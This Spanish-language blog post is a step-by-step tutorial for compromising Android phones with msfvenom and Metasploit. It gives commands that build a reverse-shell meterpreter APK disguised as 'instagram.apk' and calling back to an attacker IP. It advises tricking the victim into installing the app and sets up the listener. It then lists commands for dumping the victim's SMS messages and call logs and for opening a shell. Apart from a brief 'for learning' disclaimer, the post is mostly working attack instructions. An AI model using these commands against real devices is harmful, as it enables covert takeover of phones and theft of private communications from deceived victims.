Obtener acceso en sistemas operativos Android con msfvenom y metasploit

por | enero 19, 2018

Hola comunidad, el siguiente articulo describe como acceder a dispositivos con sistema operativo Android usando msfvenom (combinación de Msfpayload y Msfencode) y Metasploit (framework).

Escenario

  • Teléfono inteligente con sistema operativo Android 6.0
  • Equipo portátil corriendo el sistema operativo GNU/Linux Ubuntu 16.04 con msfvenom y metasploit instalados.
  • Red inalámbrica.

Primero lo primero cambiar a usuario root del sistema

sudo -sH

Ejecutar el comando msfvenom con la dirección IP atacante (equipo portátil) y puerto de escucha. Así mimo se creara la aplicación maliciosa (apk) que sera instalada en el celular inteligente mediante ingeniería social (usar su ingenio :)). En este ejemplo la nombre como instagram.apk

msfvenom -p android/meterpreter/reverse_tcp lhost=172.16.27.57 lport=4444 R > instagram.apk

Nota: La apk se creara en el directorio actual.

Se ejecuta el comando msfconsole para ingresar al framework

msfconsole

Se ejecutan los parámetros correspondientes para la explotación

use multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 172.16.27.57
set lport 4444
exploit

Llegados a este punto el equipo atacante esta a la escucha y en espera que sea instalado el apk maliciosa. Una vez instalada, se ejecuta (abrir).

Del lado del atacante se abre la sesión la cual permite ejecutar los comandos que permiten capturar contactos, llamadas, mensajes sms, chequeo si el celular esta rooteado, crear un shell, entre otros. Para conocer una lista completa de todos los comandos se ejecuta la ayuda por medio del signo de interrogación que cierra (?) .

Algunos ejemplos de comandos en Android

sysinfo : Muestra información del celular inteligente.

dump_sms: Captura y envía a un archivo de texto todos los mensajes de textos del celular inteligente.

dump_calllog: Captura y envía a un archivo de texto todas las llamadas del celular inteligente.

check_root: Verifica si el dispositivo esta rooteado.

Nota: El presente articulo se creo con fines de aprendizaje.

Saludos.

Print Friendly, PDF & Email

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *